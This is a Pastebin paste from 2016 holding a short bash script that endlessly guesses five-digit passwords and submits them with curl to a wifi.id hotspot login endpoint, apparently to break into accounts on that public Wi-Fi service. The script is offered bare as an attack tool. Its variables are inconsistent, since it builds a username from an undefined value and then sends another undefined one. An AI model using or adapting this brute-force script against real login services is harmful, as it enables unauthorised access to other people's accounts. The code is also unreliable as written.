Advertisement
Guest User

Untitled

a guest
Mar 19th, 2016
111
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.39 KB | None | 0 0
  1. #!/bin/bash
  2. while true
  3. do
  4. R=`shuf -i 15000000-16000000 -n 1`
  5. P=`echo -n $R | tail -c 5`
  6. U="0$A@ut.ac.id"
  7. echo "Passing with :"
  8. echo " Username : $C"
  9. echo " Password : $P"
  10. echo "Result:"
  11. curl --silent -d "username_=$C&username=$C.vmgmt%40event&password=$P" \
  12. http://welcome9.wifi.id/authwag/login/check_login.php \
  13. | cut -d: -f3 | cut -d} -f1 | sed -e 's/"//g'
  14. done
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement